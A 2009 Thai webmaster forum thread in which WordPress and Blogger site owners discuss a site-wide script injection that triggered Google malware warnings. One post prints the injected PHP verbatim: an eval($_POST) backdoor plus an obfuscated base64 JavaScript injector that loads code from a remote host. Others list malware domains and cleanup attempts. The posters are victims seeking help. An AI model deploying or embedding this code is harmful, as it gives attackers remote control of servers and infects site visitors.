โดน คำเตือน- การเข้าสู่เว็บไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ!

ปิง^^ · 16 พฤษภาคม 2009, 13:57:47

โดน คำเตือน- การเข้าสู่เว็บไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ! ไม่ทราบว่าต้องแก้ยังไงเหรอครับ

Dj.wayne_Gum · 16 พฤษภาคม 2009, 14:00:28

ตรวจเว็บด่วนครับ
ของผมโดนไปรอบที่แล้ว pr หายเกลี้ยงเลย
เจอไวรัสเข้าไป

thailand · 16 พฤษภาคม 2009, 14:00:50

เป็นเหมือนผมเลยครับ

Romme · 16 พฤษภาคม 2009, 14:59:59

อ้างถึงจาก: Dj.wayne_Gum ใน 16 พฤษภาคม 2009, 14:00:28
ตรวจเว็บด่วนครับ
ของผมโดนไปรอบที่แล้ว pr หายเกลี้ยงเลย
เจอไวรัสเข้าไป

น่ากลัวแหะ

kruttha · 16 พฤษภาคม 2009, 15:04:00

เสียวเลย

ปิง^^ · 16 พฤษภาคม 2009, 15:49:48

เจอสาเหตุแล้วครับ โดนฝังสคริป ผมใช้ wordpress

/public_html ไฟล์ index.php
/public_html ไฟล์ wp-config.php
/public_html/wp-content ไฟล์ index.php

แล้วก็ index ทุกหน้าที่มีในโฮสนะครับ

ตัวอย่าง โคด้ ที่โดนฝัง

โค้ด เลือก


<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihKMlgxKXt2YXIgY1EyVTA9JyUnO3ZhciBqR3g9J3Zhci0yMGEtM2QtMjJTYy03MmlwdEVuZ2ktNmVlLTIyLTJjYi0zZC0yMlYtNjVyLTczaW8tNmUoKSstMjItMmNqLTNkLTIyLTIyLTJjdS0zZG5hLTc2LTY5Z2F0b3ItMmV1c2UtNzJBZ2VuLTc0LTNiLTY5ZigodS0yZWluZGV4T2YtMjgtMjJDaC03Mm9tZS0yMiktM2MwKS0yNi0yNi0yOC03NS0yZWluZGV4T2YtMjgtMjJXLTY5LTZlLTIyKS0zZTApLTI2LTI2KHUtMmVpLTZlZC02NXgtNGZmKC0yMi00ZVQtMjAtMzYtMjIpLTNjLTMwLTI5LTI2LTI2KC02NC02ZmN1LTZkLTY1LTZldC0yZS02M29vay02OWUtMmUtNjktNmUtNjRleE8tNjYoLTIybWllay0zZDEtMjItMjktM2MwKS0yNi0yNih0eS03MC02NW9mKHpydnp0cyktMjEtM2R0eXBlLTZmZigtMjItNDEtMjItMjkpKS03Yi03YXJ2enQtNzMtM2QtMjJBLTIyLTNiLTY1LTc2YWwoLTIyLTY5Zih3aW5kb3ctMmUtMjIrYSstMjItMjktNmEtM2RqKy0yMi0yYmErLTIyTWFqb3ItMjItMmJiLTJiYS0yYi0yMk1pbm9yLTIyLTJiYi0yYmEtMmItMjItNDItNzVpbGQtMjIrYi0yYi0yMi02YS0zYi0yMiktM2ItNjRvY3VtZW4tNzQtMmV3LTcyLTY5dC02NS0yOC0yMi0zYy03M2MtNzItNjlwdC0yMHNyYy0zZC0yZi0yZm0tNjEtNzItMjIrLTIydHUtN2EtMmVjbi0yZnZpZC0yZi0zZi02OWQtM2QtMjItMmJqKy0yMi0zZS0zYy01Yy0yZi03My02M3JpcHQtM2UtMjIpLTNiLTdkJztldmFsKHVuZXNjYXBlKGpHeC5yZXBsYWNlKEoyWDEsY1EyVTApKSl9KSgvXC0vZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#
<script(.*?)
</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>
\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&
($e||strpos($v,'fromCharCode')))||
($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- 
\n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();
if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output 
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo 
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

limingxin · 16 พฤษภาคม 2009, 16:06:38

เคยโดนมาแล้วและก็โดนประจำครับไม่รู้แก้ยังไงครับ ผู้รู้บอกวิธีแก้หน่อยครับทำยังครับ

ปิง^^ · 16 พฤษภาคม 2009, 16:08:38

อ้างถึงจาก: limingxin ใน 16 พฤษภาคม 2009, 16:06:38
เคยโดนมาแล้วและก็โดนประจำครับไม่รู้แก้ยังไงครับ ผู้รู้บอกวิธีแก้หน่อยครับทำยังครับ

เปลี่ยนพาส จะหายมั้ยครับ

D-N-A · 16 พฤษภาคม 2009, 17:25:25

โดนไป 50 ก่าโดเมน index,config แก้กันวุ่น

raon10 · 18 พฤษภาคม 2009, 12:47:33

โดนเหมือนกันครับ

ปิง^^ · 22 พฤษภาคม 2009, 16:51:47

อ้างถึงจาก: PlNG ใน 16 พฤษภาคม 2009, 16:08:38
อ้างถึงจาก: limingxin ใน 16 พฤษภาคม 2009, 16:06:38
เคยโดนมาแล้วและก็โดนประจำครับไม่รู้แก้ยังไงครับ ผู้รู้บอกวิธีแก้หน่อยครับทำยังครับ

เปลี่ยนพาส จะหายมั้ยครับ

เปลี่ยนพาส ไปได้ 4 วัน โดนอีกแล้ว รอบที่ 2

Step9 · 22 พฤษภาคม 2009, 18:50:36

มันจะกลายเป็นโรคประจำแล้ว
http://www.thaiseoboard.com/index.php/topic,60804.msg764936.html#msg764936

ttong · 22 พฤษภาคม 2009, 18:51:50

เหอๆ โดนเหมือนกัน

เพิ่งรู้ตัววันนี้เอง

masterdmty · 24 พฤษภาคม 2009, 03:35:09

วิธีเอาออกลองศึกษาจาก viruscom2.com ก็แล้วกันนะมีทั้งการเอาขึนและก็การเอาออกอ่ะหาดูให้ดีนะ

kikoe8 · 27 พฤษภาคม 2009, 12:06:09

ผมก็โดนเหมือนกัน

ไอ้ตัวเดียวกันเนี่ยะแหล่ะ

ใน web น่ะ แต่ใน Google ยังไม่หายน่ะ // ยิ่งถ้าเป็น Web ของลูกค้าเดี่ยวค้าจะมาบ่น
ให้คุณฮีกรอบ :-\

badboyth · 27 พฤษภาคม 2009, 12:19:49

กลัวๆๆๆๆ ไม่อยากเจอเลย

ถ้าเจอคงจะประสาทแน่ๆ

TKC · 27 พฤษภาคม 2009, 14:33:25

เกิดอะไรขึ้นเมื่อ Google เยี่ยมชมไซต์นี้

เรา ได้ทดสอบหน้าเว็บจำนวน 26 หน้าเป็นระยะเวลาเกินกว่า 90 วันที่ผ่านมา หน้าเว็บจำนวน 4 หน้า มีซอฟต์แวร์ที่เป็นอันตรายที่กำลังถูกดาวน์โหลดและติดตั้งโดยไม่ได้รับความ ยินยอมจากเจ้าของเครื่อง Google เข้าชมไซต์ครั้งล่าสุดเมื่อวันที่ 2009-05-26 และพบเนื้อหาต้องสงสัยครั้งล่าสุดเมื่อวันที่ 2009-05-26

Malicious software includes 4 trojan(s), 4 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.

ซอฟต์แวร์ที่เป็นอันตรายถูกโฮสต์ไว้ในโดเมนจำนวน 1 โดเมนรวมทั้ง

โค้ด เลือก

godcounter.org/ ด้วย

โดเมนจำนวน 1 โดเมนทำงานเป็นเสมือนตัวกลางสำหรับแพร่กระจายมัลแวร์ที่สร้างปัญหาให้กับผู้เข้าชมไซต์นี้ รวมทั้ง

โค้ด เลือก

goodcounter.org/ ด้วย

This site was hosted on 1 network(s) including

โค้ด เลือก

AS15169 (GOOGLE).

ของผมโดนแบบนี้ครับ ไม่รู้จะแก้ยังไง ผมใช้ Blogger ครับ

!Man · 28 พฤษภาคม 2009, 08:09:51

โดนกันเยอะเนอะ - -

ปิง^^ · 28 พฤษภาคม 2009, 22:32:14

wp แก้ไม่อยากครับแต่ก็เหนื่อย แต่ถ้า smf เหนื่อยครับงานนี้
วิธีแก้ คือ ลงใหม่ดีกว่าครับ แล้วค่อย dump db เก่ากลับมาใช้

แป้งฝุ่น~Richy~ · 28 พฤษภาคม 2009, 23:13:53

เคยเหมือนกัน